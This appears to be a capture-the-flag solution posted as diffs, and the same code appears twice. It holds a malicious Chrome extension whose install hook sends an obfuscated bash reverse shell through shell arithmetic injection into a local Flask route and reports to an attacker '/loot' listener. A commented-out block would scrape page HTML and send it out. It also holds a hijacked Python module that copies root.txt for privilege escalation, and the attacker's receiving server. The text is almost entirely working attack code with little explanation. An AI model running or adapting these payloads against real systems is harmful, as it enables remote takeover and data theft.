sharpicx · January 30, 2026 08:45
diff --git a/background.js b/background.js
 // https://dev.to/greymd/eq-can-be-critically-vulnerable-338m
 // https://ya.maya.st/d/201909a.html
 // https://www.nccgroup.com/research-blog/shell-arithmetic-expansion-and-evaluation-abuse/
 // https://github.com/koalaman/shellcheck/issues/3088

 chrome.runtime.onInstalled.addListener(async () => {
  const lhost = "10.10.14.210";
  const serverPort = "8081";
  const flaskAddr = "http://127.0.0.1:5000";

  const revShell =
    "echo${IFS}L2Jpbi9iYXNoIC1jICIvYmluL2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMjEwLzk5OTkgMD4mMSI=|base64${IFS}-d|bash";
  const payload = `xxx[$(${revShell})]`;
  const targetUrl = `${flaskAddr}/routines/${encodeURIComponent(payload)}`;

  try {
    await fetch(targetUrl, { mode: "no-cors" });
    await fetch(`http://${lhost}:${serverPort}/loot`, {
      method: "POST",
      mode: "no-cors",
      body: btoa("Payload Sent to Flask: " + targetUrl),
      keepalive: true,
    });
  } catch (e) {
    await fetch(`http://${lhost}:${serverPort}/loot`, {
      method: "POST",
      mode: "no-cors",
      body: btoa("Fetch Failed: " + e.toString()),
      keepalive: true,
    });
  }
 });
 // const serverAddr = "10.10.14.210";
 // const serverPort = "8081";
 // const targetHost = "http://browsedinternals.htb";
 // async function pushData(payload) {
 //   const b64 = btoa(unescape(encodeURIComponent(payload)));
 //   await fetch(`http://${serverAddr}:${serverPort}/loot`, {
 //     method: "POST",
 //     mode: "no-cors",
 //     body: b64,
 //   });
 // }
 // chrome.tabs.create({ url: targetHost, active: false }, (tab) => {
 //   chrome.tabs.onUpdated.addListener(function listener() {
 //     chrome.tabs.onUpdated.removeListener(listener);
 //     chrome.scripting.executeScript(
 //       {
 //         target: { tabId: tab.id },
 //         func: () => document.documentElement.outerHTML,
 //       },
 //       async (results) => {
 //         await pushData(results[0].result);
 //         chrome.tabs.remove(tab.id);
 //       },
 //     );
 //   });
 // });
diff --git a/extension_utils.py b/extension_utils.py
 # insecure permission at /opt/extensiontool/__pycache__
 # read this blog really helpful by @xct: https://vuln.dev/vulnlab-odori/
 #
 # python3 -m compileall extension_utils.py --invalidation-mode unchecked-hash
 # sudo /opt/extensiontool/extension_tool.py
 # Traceback (most recent call last):
 # File "/opt/extensiontool/extension_tool.py", line 5, in <module>
 #    from extension_utils import validate_manifest, clean_temp_files
 # ImportError: cannot import name 'validate_manifest' from 'extension_utils' (/opt/extensiontool/extension_utils.py)

 import os
 os.system("cp /root/root.txt /tmp/root.txt; chmod 777 /tmp/root.txt")
diff --git a/manifest.json b/manifest.json
 {
  "manifest_version": 3,
  "name": "abc",
  "version": "1.0",
  "description": "abc",
  "permissions": ["tabs", "scripting", "<all_urls>"],
  "host_permissions": ["<all_urls>", "*://*/*"],
  "background": {
    "service_worker": "background.js"
  }
 }
diff --git a/server.py b/server.py
 from http.server import HTTPServer, BaseHTTPRequestHandler
 import base64
 from pwn import log
 from urllib.parse import unquote

 class SyncHandler(BaseHTTPRequestHandler):
    def do_POST(self):
        content_length = int(self.headers['Content-Length'])
        post_data = self.rfile.read(content_length).decode('utf-8')
        try:
            raw_decoded = base64.b64decode(post_data).decode('utf-8')
            final_data = unquote(raw_decoded)
            log.success(f"Incoming from {self.client_address[0]}:")
            print(final_data)
            print()
        except Exception as e:
            log.warning(f"Decode error: {e}")
        self.send_response(204)
        self.end_headers()

    def log_message(self, format, *args):
        return

 if __name__ == '__main__':
    server_address = ('0.0.0.0', 8081)
    httpd = HTTPServer(server_address, SyncHandler)
    try:
        httpd.serve_forever()
    except KeyboardInterrupt:
        log.warning("Exiting...")
	// https://dev.to/greymd/eq-can-be-critically-vulnerable-338m
	// https://ya.maya.st/d/201909a.html
	// https://www.nccgroup.com/research-blog/shell-arithmetic-expansion-and-evaluation-abuse/
	// https://github.com/koalaman/shellcheck/issues/3088

	chrome.runtime.onInstalled.addListener(async () => {
	const lhost = "10.10.14.210";
	const serverPort = "8081";
	const flaskAddr = "http://127.0.0.1:5000";

	const revShell =
	"echo${IFS}L2Jpbi9iYXNoIC1jICIvYmluL2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMjEwLzk5OTkgMD4mMSI=\|base64${IFS}-d\|bash";
	const payload = `xxx[$(${revShell})]`;
	const targetUrl = `${flaskAddr}/routines/${encodeURIComponent(payload)}`;

	try {
	await fetch(targetUrl, { mode: "no-cors" });
	await fetch(`http://${lhost}:${serverPort}/loot`, {
	method: "POST",
	mode: "no-cors",
	body: btoa("Payload Sent to Flask: " + targetUrl),
	keepalive: true,
	});
	} catch (e) {
	await fetch(`http://${lhost}:${serverPort}/loot`, {
	method: "POST",
	mode: "no-cors",
	body: btoa("Fetch Failed: " + e.toString()),
	keepalive: true,
	});
	}
	});
	// const serverAddr = "10.10.14.210";
	// const serverPort = "8081";
	// const targetHost = "http://browsedinternals.htb";
	// async function pushData(payload) {
	// const b64 = btoa(unescape(encodeURIComponent(payload)));
	// await fetch(`http://${serverAddr}:${serverPort}/loot`, {
	// method: "POST",
	// mode: "no-cors",
	// body: b64,
	// });
	// }
	// chrome.tabs.create({ url: targetHost, active: false }, (tab) => {
	// chrome.tabs.onUpdated.addListener(function listener() {
	// chrome.tabs.onUpdated.removeListener(listener);
	// chrome.scripting.executeScript(
	// {
	// target: { tabId: tab.id },
	// func: () => document.documentElement.outerHTML,
	// },
	// async (results) => {
	// await pushData(results[0].result);
	// chrome.tabs.remove(tab.id);
	// },
	// );
	// });
	// });
	# insecure permission at /opt/extensiontool/__pycache__
	# read this blog really helpful by @xct: https://vuln.dev/vulnlab-odori/
	#
	# python3 -m compileall extension_utils.py --invalidation-mode unchecked-hash
	# sudo /opt/extensiontool/extension_tool.py
	# Traceback (most recent call last):
	# File "/opt/extensiontool/extension_tool.py", line 5, in <module>
	# from extension_utils import validate_manifest, clean_temp_files
	# ImportError: cannot import name 'validate_manifest' from 'extension_utils' (/opt/extensiontool/extension_utils.py)

	import os
	os.system("cp /root/root.txt /tmp/root.txt; chmod 777 /tmp/root.txt")
	{
	"manifest_version": 3,
	"name": "abc",
	"version": "1.0",
	"description": "abc",
	"permissions": ["tabs", "scripting", "<all_urls>"],
	"host_permissions": ["<all_urls>", ":///*"],
	"background": {
	"service_worker": "background.js"
	}
	}
	from http.server import HTTPServer, BaseHTTPRequestHandler
	import base64
	from pwn import log
	from urllib.parse import unquote

	class SyncHandler(BaseHTTPRequestHandler):
	def do_POST(self):
	content_length = int(self.headers['Content-Length'])
	post_data = self.rfile.read(content_length).decode('utf-8')
	try:
	raw_decoded = base64.b64decode(post_data).decode('utf-8')
	final_data = unquote(raw_decoded)
	log.success(f"Incoming from {self.client_address[0]}:")
	print(final_data)
	print()
	except Exception as e:
	log.warning(f"Decode error: {e}")
	self.send_response(204)
	self.end_headers()

	def log_message(self, format, *args):
	return

	if __name__ == '__main__':
	server_address = ('0.0.0.0', 8081)
	httpd = HTTPServer(server_address, SyncHandler)
	try:
	httpd.serve_forever()
	except KeyboardInterrupt:
	log.warning("Exiting...")